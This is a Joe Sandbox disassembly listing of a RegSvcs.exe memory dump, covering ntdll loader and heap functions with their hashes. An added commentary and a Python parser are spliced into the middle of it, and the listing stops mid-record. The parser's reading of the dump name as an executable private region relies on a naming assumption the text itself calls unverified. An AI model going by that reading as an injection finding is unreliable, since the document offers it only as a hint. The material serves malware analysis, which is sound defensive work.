                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015E9A2A
                                                              • LdrpInitShimEngine, xrefs: 015E99F4, 015E9A07, 015E9A30
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015E99ED
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              • Opcode ID: b35290789fce67f3f58b6a8bc802f8360ed364204db67cda5f668ea0c9ae8f4d
                                                              • Instruction ID: 2bfbd30a55d350deee2651dfdb88b91695c808962cc42f16e638eca6fe15ca9a
                                                              • Opcode Fuzzy Hash: b35290789fce67f3f58b6a8bc802f8360ed364204db67cda5f668ea0c9ae8f4d
                                                              • Instruction Fuzzy Hash: 42519F71608305AFE725EF24DC45AAFB7E9FF84648F40091DE585AF260D670E944CB92
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 01602165
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016021BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01602180
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01602160, 0160219A, 016021BA
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01602178
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0160219F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              • Opcode ID: 5f7d298cc6879ba6215782a751ddbef87187aa54e27673b32b968262ac74a0e1
                                                              • Instruction ID: 70479e687f8b0c9c1813c5039002a8e0156343971cae9615e4fc9599cd2eb385
                                                              • Opcode Fuzzy Hash: 5f7d298cc6879ba6215782a751ddbef87187aa54e27673b32b968262ac74a0e1
                                                              • Instruction Fuzzy Hash: E2312A36A40211BBE7128ED5DC89F5B7AB9FF54E40F0540ADBB04AF240D7709A01C6A0
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015CC6C3
                                                              • LdrpInitializeProcess, xrefs: 015CC6C4
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01608181, 016081F5
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 016081E5
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01608170
                                                              • LdrpInitializeImportRedirection, xrefs: 01608177, 016081EB
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: d0cb001743aa248665aad7c96c376f75fc13e30fadd768483816af5b3c4d701f
                                                              • Instruction ID: 3d1c9ef19e16245658153fdffde39ee118036a789d2028541097d6384ddfd47a
                                                              • Opcode Fuzzy Hash: d0cb001743aa248665aad7c96c376f75fc13e30fadd768483816af5b3c4d701f
                                                              • Instruction Fuzzy Hash: AD31E071644712AFC324EF68DD86E2B7795BFD4B24F040A6CF944AF291E660EC04C7A2
                                                              APIs
                                                                • Part of subcall function 015D2DF0: LdrInitializeThunk.NTDLL ref: 015D2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0D74
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: aa6f3a84fe3c172d5602b9f941ba37ccbd71a9cdf6e35f1e8d180a067a86d194
                                                              • Instruction ID: a29bbe668b590112b164c4d164c9a55b92ebfc049cd5c5fac63f90de54a538d1
                                                              • Opcode Fuzzy Hash: aa6f3a84fe3c172d5602b9f941ba37ccbd71a9cdf6e35f1e8d180a067a86d194
                                                              • Instruction Fuzzy Hash: B6425A71900716DFDB25CF28C880BAAB7F5FF44314F1445AAE9899B282D770AA85CF60
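The blocks above are the Joe Sandbox IDA plugin's per-function records (a Strings or APIs list, the Memory Dump Source the function was lifted from, and the Opcode ID / Instruction Fuzzy Hash used for similarity). A reviewer who wants to cluster these across dumps or reports needs them as structured data, so the parser below is added here as an example; it is not Joe Sandbox code. SAMPLE holds two blocks copied from this page and trimmed to a few lines. The describe_region helper decodes the .sdmp file name under an assumption of mine that the report does not document: that the fields after the timestamp are base address, protection, state and type in Win32 MEMORY_BASIC_INFORMATION terms. If that holds, 00000040 / 00001000 / 00020000 read as a committed, private, PAGE_EXECUTE_READWRITE region holding ntdll loader code (the strings cite minkernel\ntdll\ldrinit.c), which is the kind of region to cross-check against the report's "Found direct / indirect Syscall" and injection signatures rather than an image mapping.

```python
"""Parse the per-function blocks of a Joe Sandbox disassembly listing (added
example, not Joe Sandbox code). A block is a "Strings" or "APIs" header, its
bullet entries, then "Memory Dump Source" / "Joe Sandbox IDA Plugin" /
"Similarity" sections of key/value bullets. SAMPLE: two trimmed blocks from this page."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

SAMPLE = """\
Strings
• AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01618A67
• VerifierFlags, xrefs: 01618C50
Memory Dump Source
• Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Similarity
• API ID:
• String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$VerifierFlags
• Instruction Fuzzy Hash: D8912672A41702AFD721EF68CC90B6A7BA9FB94B14F48465CFA42AF258C7709C01C795
APIs
  • Part of subcall function 015D2DF0: LdrInitializeThunk.NTDLL ref: 015D2DFA
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015D0BA3
Memory Dump Source
• Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
• String ID:
• Instruction Fuzzy Hash: B6425A71900716DFDB25CF28C880BAAB7F5FF44314F1445AAE9899B282D770AA85CF60
"""

HEADERS = {"Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

@dataclass
class FunctionBlock:
    kind: str                                    # "Strings" or "APIs"
    strings: list = field(default_factory=list)  # (text, [xref, ...])
    apis: list = field(default_factory=list)     # (api, module, ref, subcall or None)
    fields: dict = field(default_factory=dict)   # "Opcode ID", "Source File", ...

    @property
    def string_ids(self):
        # "String ID" is the function's strings joined with '$'; an empty
        # component is a string the plugin rendered as empty, so keep it.
        v = self.fields.get("String ID", "")
        return v.split("$") if v else []

def _parse_entry(block, body):
    if block.kind == "Strings":  # "<text>, xrefs: 0160542B, 01605496"
        text, sep, xrefs = body.rpartition(", xrefs:")
        if not sep:
            text, xrefs = body, ""
        block.strings.append((text, [x.strip() for x in xrefs.split(",") if x.strip()]))
    else:  # "LdrInitializeThunk.NTDLL ref: 015D2DFA", optionally a subcall
        m = re.match(r"Part of subcall function ([0-9A-Fa-f]+):\s*(.*)", body)
        subcall, body = (m.group(1), m.group(2)) if m else (None, body)
        head, _, ref = body.rpartition(" ref: ")
        api, _, module = head.rpartition(".")
        block.apis.append((api, module, ref.strip(), subcall))

def parse_blocks(text):
    blocks, cur, in_entries = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line in ("Strings", "APIs"):
            cur, in_entries = FunctionBlock(kind=line), True
            blocks.append(cur)
        elif line in HEADERS:
            in_entries = False
        elif line.startswith("•") and cur is not None:
            body = line[1:].strip()
            if in_entries:
                _parse_entry(cur, body)
            else:  # "Source File" packs three fields on one line; values may contain ':'
                for part in (body.split(", ") if body.startswith("Source File:") else [body]):
                    k, _, v = part.partition(":")
                    cur.fields[k.strip()] = v.strip()
    return blocks

# Assumption, not stated by the report: the dot-separated .sdmp name is
# <proc idx>.<dump idx>.<timestamp>.<base>.<protect>.<state>.<type>.<?>, with
# protect/state/type being the Win32 MEMORY_BASIC_INFORMATION constants.
PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
           0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
           0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MTYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

def describe_region(source_file):
    f = source_file.rsplit(".sdmp", 1)[0].split(".")
    if len(f) < 7:
        return None
    base, prot, state, mtype = (int(x, 16) for x in f[3:7])
    return {"base": base, "protect": PROTECT.get(prot & 0xFF, hex(prot)),  # mask PAGE_GUARD etc.
            "state": STATE.get(state, hex(state)), "type": MTYPE.get(mtype, hex(mtype))}

def index_by(blocks, key):
    """Group blocks by a field (e.g. 'Instruction Fuzzy Hash') to cluster identical functions."""
    idx = defaultdict(list)
    for b in blocks:
        if key in b.fields:
            idx[b.fields[key]].append(b)
    return dict(idx)
```

Running parse_blocks over a whole exported listing and then index_by on "Instruction Fuzzy Hash" or "Opcode ID" is enough to see which functions recur between this RegSvcs.exe dump and dumps from other samples; describe_region is only as reliable as the naming assumption stated above, so treat its output as a hint to verify in the report's memory-region table, not as a finding.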
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                              • Instruction ID: 0abf4257855c6b09729cf8ba5588c97204a98bfbd12837d044a299474b48c4a8
                                                              • Opcode Fuzzy Hash: 03c042d9c5b7bd2ce449d04f7dac8e5aca71056ab94c28616d3ec1260575cbc0
                                                              • Instruction Fuzzy Hash: 15C169746083829FDB21CF58C144B6AB7E4BF85704F04896EFA998F251E774C949CBA3
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015C8421
                                                              • LdrpInitializeProcess, xrefs: 015C8422
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015C855E
                                                              • @, xrefs: 015C8591
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1918872054
                                                              • Opcode ID: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                              • Instruction ID: 574bf112b7c7dfdc0caf7b82bf0e21cf7bfc036c6e7f3c8f17e0396f7fc9a3d6
                                                              • Opcode Fuzzy Hash: 5bc1626fe3f95e0182ae6513468e3acee36b9b545cc619e6f70ea5a5260ede53
                                                              • Instruction Fuzzy Hash: CD919E71508346AFE722DF65CC80EAFBAECBF94B44F40092EF6859A150E374D904CB62
                                                              Strings
                                                              • SXS: %s() passed the empty activation context, xrefs: 016021DE
                                                              • .Local, xrefs: 015C28D8
                                                              • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 016021D9, 016022B1
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 016022B6
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                              • API String ID: 0-1239276146
                                                              • Opcode ID: 8b880e59180ea33041531c06fe0db1aba83dcee4d45dc169be3732775f29fda2
                                                              • Instruction ID: 3f1facf24e6b014fa1ac4847276c1a8a2c62660d1c7d8a43c2725902871a29d5
                                                              • Opcode Fuzzy Hash: 8b880e59180ea33041531c06fe0db1aba83dcee4d45dc169be3732775f29fda2
                                                              • Instruction Fuzzy Hash: B5A19C3190022A9FDB25CFA8DC88BAAB7B1BF58754F1545EDD908AB251D7709EC0CF90
                                                              Strings
                                                              • RtlDeactivateActivationContext, xrefs: 01603425, 01603432, 01603451
                                                              • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01603437
                                                              • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01603456
                                                              • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0160342A
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                              • API String ID: 0-1245972979
                                                              • Opcode ID: 94ff738cc87528d263f23eda47e04817e6ce60aa153da2626b8b13524d822215
                                                              • Instruction ID: 29582c4a6ebe4e29e90d9f54958dde9cc1adaec5983934b099d3a2d4be2d916b
                                                              • Opcode Fuzzy Hash: 94ff738cc87528d263f23eda47e04817e6ce60aa153da2626b8b13524d822215
                                                              • Instruction Fuzzy Hash: E961FD366416129FDB278E5CCC92F2AB7E1FF80B11F15852DE8559F390DB30E8018B91
                                                              Strings
                                                              • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 015F1028
                                                              • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 015F106B
                                                              • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 015F10AE
                                                              • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 015F0FE5
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                              • API String ID: 0-1468400865
                                                              • Opcode ID: f28d942f4e6dbe5e16af3f7a432539ec323f5cadff884569fa65f8b61c4fc9f5
                                                              • Instruction ID: 5c912b82d0b8419f707fbc1472d3fa86f8d0bd59909ea2bac73b5a626e0fca50
                                                              • Opcode Fuzzy Hash: f28d942f4e6dbe5e16af3f7a432539ec323f5cadff884569fa65f8b61c4fc9f5
                                                              • Instruction Fuzzy Hash: 7071B0B19043069FCB21DF18C885B9B7BA9BF95764F844868F9488F186D734D588CBD2
                                                              Strings
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01603640, 0160366C
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0160362F
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 0160365C
                                                              • LdrpFindDllActivationContext, xrefs: 01603636, 01603662
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 0-3779518884
                                                              • Opcode ID: cb944319119d279bcb392f66471d2eddf761f7296ee36c2adc31daa69150c030
                                                              • Instruction ID: a2d550128816e4e603b5cf66810f571bd13a4027871274765d393381157bee9a
                                                              • Opcode Fuzzy Hash: cb944319119d279bcb392f66471d2eddf761f7296ee36c2adc31daa69150c030
                                                              • Instruction Fuzzy Hash: EA31F972A00651AEDF36BE8CCC69F3E76A4BB01F54F06416EE9055F261DBA0DC8087D5
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015FA9A2
                                                              • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 015FA992
                                                              • apphelp.dll, xrefs: 015B2462
                                                              • LdrpDynamicShimModule, xrefs: 015FA998
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-176724104
                                                              • Opcode ID: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                              • Instruction ID: 5737df50f2a51b5261ae8b8c303ff5f631d19a748b2858119d04fcf500f8d061
                                                              • Opcode Fuzzy Hash: 5c3a6290bf378068f2d59e38b0228a5f0b391ca9d5d2c43fe40c85d5be26c211
                                                              • Instruction Fuzzy Hash: B8314671610202BBDB31AF59DD81EAE7BB4FB80B00F16012DEA056F345C7B0A851C791
                                                              Strings
                                                              • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 015A327D
                                                              • HEAP[%wZ]: , xrefs: 015A3255
                                                              • HEAP: , xrefs: 015A3264
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                              • API String ID: 0-617086771
                                                              • Opcode ID: 534154be0c48d553f66fae68609f4cf9e933dc98f236505f57d21acb3b9b2e0f
                                                              • Instruction ID: 4681bb58c2f26c377d9a70c33667ef7b3dcf4282a5ba644cd7b8bb80acf91450
                                                              • Opcode Fuzzy Hash: 534154be0c48d553f66fae68609f4cf9e933dc98f236505f57d21acb3b9b2e0f
                                                              • Instruction Fuzzy Hash: E992DC70A442499FDB25CFA8C4457AEBBF1FF48304F5884A9E95AAF351D334A941CF50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-4253913091
                                                              • Opcode ID: e26830a80e191111c067ea18c2ac7319ff63817ae729d6af1f51430dd059b676
                                                              • Instruction ID: 899a5227f074a1cfd4147768bb830d0cbe2a41cae65609bf3d428a3f67cea99c
                                                              • Opcode Fuzzy Hash: e26830a80e191111c067ea18c2ac7319ff63817ae729d6af1f51430dd059b676
                                                              • Instruction Fuzzy Hash: 34F19B30A50606DFEB25CF68C894B6EBBF5FB44304F5486A8E5469F391D730E981CB90
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $@
                                                              • API String ID: 0-1077428164
                                                              • Opcode ID: ec4e16244196d3136ac8bf84fc58643e5f0b2081c0839f7a7d0605e9d70ca0fb
                                                              • Instruction ID: e90d2920bf5ef704da3b1441429fe58c46ca41138d25bb3f1500a1e873199468
                                                              • Opcode Fuzzy Hash: ec4e16244196d3136ac8bf84fc58643e5f0b2081c0839f7a7d0605e9d70ca0fb
                                                              • Instruction Fuzzy Hash: 88C25D716083459FDB25CF28C881BAFBBE5BFC8754F04892DEA898B291D734D845CB52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: FilterFullPath$UseFilter$\??\
                                                              • API String ID: 0-2779062949
                                                              • Opcode ID: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                              • Instruction ID: f29983a5c6bfca4f9ca0771e46d44eb12c801ce49ca42f8b09a3a0749fec1160
                                                              • Opcode Fuzzy Hash: a517b525724dbcae17cc69e64e96a1bd83acd7aa17d2c20fd003c9ab6de2f2cd
                                                              • Instruction Fuzzy Hash: 58A13C71D1162A9BDB359F68CC88BADB7B8FF48710F1041EAD909AB250E7359E84CF50
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015FA121
                                                              • LdrpCheckModule, xrefs: 015FA117
                                                              • Failed to allocated memory for shimmed module list, xrefs: 015FA10F
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-161242083
                                                              • Opcode ID: 466805270c8ac7d85d1e3c8fd4ef79af23f30780748b184c381c48ce8298f5eb
                                                              • Instruction ID: 3ef61e475d686ddc25d2fb1cc75a3214722d401e4d71753ae64ba604f75ece1a
                                                              • Opcode Fuzzy Hash: 466805270c8ac7d85d1e3c8fd4ef79af23f30780748b184c381c48ce8298f5eb
                                                              • Instruction Fuzzy Hash: 4F71EC70A00206EFDB25EF68CC81ABEB7F4FB88704F15442DE906AF291E730A941CB51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                              • API String ID: 0-1334570610
                                                              • Opcode ID: d7ae889b22459333fb3a56340bf87ddc0a59b6bbecf1b70a7334c9e850e83775
                                                              • Instruction ID: ec933785e8d95cd12b8ad395f13cc1eedc889c3c3bc1967b0cd5f4f7dbbf6159
                                                              • Opcode Fuzzy Hash: d7ae889b22459333fb3a56340bf87ddc0a59b6bbecf1b70a7334c9e850e83775
                                                              • Instruction Fuzzy Hash: 2E619D706603069FDB29DF28C940B6EBBE1FF44704F54855DE95A8F292D770E881CB91
                                                              Strings
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 016082E8
                                                              • Failed to reallocate the system dirs string !, xrefs: 016082D7
                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 016082DE
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-1783798831
                                                              • Opcode ID: a6e2b09511265d4f6110b94caf52d32033857abcadfa661994f37597d0e5e3d5
                                                              • Instruction ID: 533c75133a2566ef4758803167121ee7c727d54acfcc8a87609da03ede72ae15
                                                              • Opcode Fuzzy Hash: a6e2b09511265d4f6110b94caf52d32033857abcadfa661994f37597d0e5e3d5
                                                              • Instruction Fuzzy Hash: 2D41D071550312ABC721EFA8DC44B5F7BE8FB98B54F004A2EB949DB290E770D8108B92
                                                              Strings
                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0164C1C5
                                                              • PreferredUILanguages, xrefs: 0164C212
                                                              • @, xrefs: 0164C1F1
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                              • API String ID: 0-2968386058
                                                              • Opcode ID: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
                                                              • Instruction ID: c499b643916bef4a51ba988129c7cf8eeac2772d9f48b1dac4cae7a6f380fad4
                                                              • Opcode Fuzzy Hash: e12375df721db5eddfd1cf3694e8fc9088d935822dcf0506dc59c040db29e335
                                                              • Instruction Fuzzy Hash: 38416271E1120AEBDB11DED9CC51FEFBBB8BB54704F14806AE605B7340E7B49A458B50
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000F.00000002.1576401397.0000000001560000.00000040.00001000.00020000.00000000.sdmp, Offset: 01560000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_15_2_1560000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                              • API String ID: 0-1373925480
                                                              • Opcode ID: aa202f814b564eabbddd6b0b9124eacc10859c5efe3c8ea085f5a1341b259f0b
                                                              • Instruction ID: d6f5a90e7c66356d33f3074fc264097ad29073c01750ff5a6f5e2b2d8083ac41
